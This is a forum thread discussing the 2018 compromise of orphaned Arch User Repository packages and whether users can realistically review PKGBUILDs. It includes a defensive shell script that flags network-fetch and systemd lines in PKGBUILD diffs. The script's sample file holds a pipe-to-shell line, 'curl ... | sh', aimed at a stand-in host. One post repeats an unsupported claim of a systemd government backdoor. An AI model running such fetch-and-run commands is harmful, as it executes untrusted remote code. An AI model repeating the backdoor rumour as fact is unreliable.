Arch User Repository compromised


#1

https://lists.archlinux.org/pipermail/aur-general/2018-July/034151.html

Years ago I decided against using Arch because of the user repository (and the seeming lack of scrutiny). Amazed it took someone this long…

Let's hope they come up with some kind of community-based cross-checking (and that it's not too complicated!)


#2

And interestingly:

The aim of the modified lines in acroread was to use curl to download scripts from a remote site, and the script would (if it worked) reconfigure systemd to restart on a regular basis.

Looks like systemd makes it easier for compromises: one platform (systemdOS), one payload…


(karl-k) #3

Yeah, this was an obvious flaw of systemd; it makes it very easy to compromise security. But I wouldn't say the AUR is at fault for that: the AUR is a user repository, and everyone who uses it should thoroughly check their PKGBUILDs for anything weird like that. When you use the AUR you are using it at your own risk. Never forget that.

I remember reading a post that claimed that the people who develop systemd (Fedora/Red Hat) have the US government as their biggest customer, and that if there were ever a "backdoor" in Linux while Linus is still alive it would be through systemd (the US government is trying to do this, I guess, was what was implied; I am probably butchering what I remember, sorry). Not sure how credible that claim is, but it reminded me of that.


#4

I don't think checking PKGBUILDs is even vaguely realistic. Are you really gonna do it for each and every update?


(maxice8 alter) #5

It is what people on Reddit say is expected, while 0.9% do it.


#6

You, sir, are totally right. I agree with your statement.

Biggest customer always has the biggest impact on software.


(Gus Fun) #7

You can use Arch without access to anything from the AUR; the official repositories are still second only to Debian's without the AUR.
What is actually hard for the newcomer is to find a way to access the AUR.
Still, those were three orphaned packages out of tens of thousands that someone took over and added a malicious hack to, and the few that used them neglected to look through the PKGBUILD's edits.

As it seems, the problem was caught and eliminated quickly.
Thousands of hard-working coders have found a place to build their careers and names in the AUR, and there is a very positive aspect to the existence of the AUR in this respect. After all, it is open and free code.


(maxice8 alter) #8

Gentoo is the one with the most applications, so Arch would be third, if that were true and not a bad joke.


#9

Using Arch without the AUR must have changed markedly since I last used it (and it has been a number of years!), as it only seemed to have the very core of an OS.

At the end of the day, expecting everyone to look through every PKGBUILD for every update because of a lack of a basic security mechanism is unrealistic and is sadly a severe issue with Arch…


(Ben) #10

Disagree completely with the general tenor of this discussion. It's totally viable to check all PKGBUILDs, as long as you have a workflow that values regular updates (you don't do loads of packages at a time) and allows for textual diffs. You check the whole thing only once. 99% of builds are super simple, and if I can't understand a PKGBUILD I don't include it. The vast majority of my packages come from the main distro. Easy. Better the AUR than having to build and manage those sources myself. Even checking for upstream updates would be more of a chore than reading the PKGBUILDs.

Threads slagging off other distros are boorish and petty and fundamentally speak to a lack of interesting conversation to be had around Void, which is a shame because it is interesting in its own right.
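The "diff the PKGBUILD before you build it" workflow from post #10, as an added shell example that is not code from this thread, from the Arch project, or from the mailing-list post. The two PKGBUILD versions and the `example.invalid` URL are constructed for the demo so it runs offline; in practice the old file is the copy you last reviewed and the new one is the fresh checkout. The pattern list is only a starting point for what to eyeball first (network fetches and systemd changes, as in the acroread modification), not a substitute for reading the whole diff.

```shell
#!/bin/sh
# Added example, not from the thread: flag added diff lines in an AUR PKGBUILD
# that fetch code from the network or touch systemd, then let the human decide.

# Print the lines the new PKGBUILD ADDS (diff '+' lines, header excluded) that
# match a small watch-list. Empty output means nothing matched this check.
flag_added_lines() {          # $1 = reviewed PKGBUILD, $2 = newly fetched one
  diff -u "$1" "$2" | grep '^+[^+]' | cut -c2- \
    | grep -E 'curl|wget|systemctl|systemd|\|[[:space:]]*(sh|bash)( |$)' || true
}

# Number of flagged lines; 0 means clean by this (deliberately narrow) check.
count_flags() {
  flag_added_lines "$1" "$2" | grep -c . || true
}

# Writes the two constructed PKGBUILDs, runs the check, prints the count.
demo() {
  dir=$(mktemp -d)
  cat > "$dir/old" <<'EOF'
pkgname=examplepkg
pkgver=1.0
pkgrel=1
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('SKIP')
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF
  cat > "$dir/new" <<'EOF'
pkgname=examplepkg
pkgver=1.0
pkgrel=2
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('SKIP')
package() {
  cd "$pkgname-$pkgver"
  curl -s https://example.invalid/x | sh
  make DESTDIR="$pkgdir" install
}
EOF
  echo "--- flagged additions (constructed new PKGBUILD):" >&2
  flag_added_lines "$dir/old" "$dir/new" >&2
  n=$(count_flags "$dir/old" "$dir/new")
  rm -rf "$dir"
  echo "$n"                    # prints 1: only the curl|sh line is flagged
}
```

The pkgrel bump is an ordinary, unflagged change; the pipe-to-shell line is the kind of addition the thread is about, and the point is to refuse to build until a human has read it.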


(Erin) #11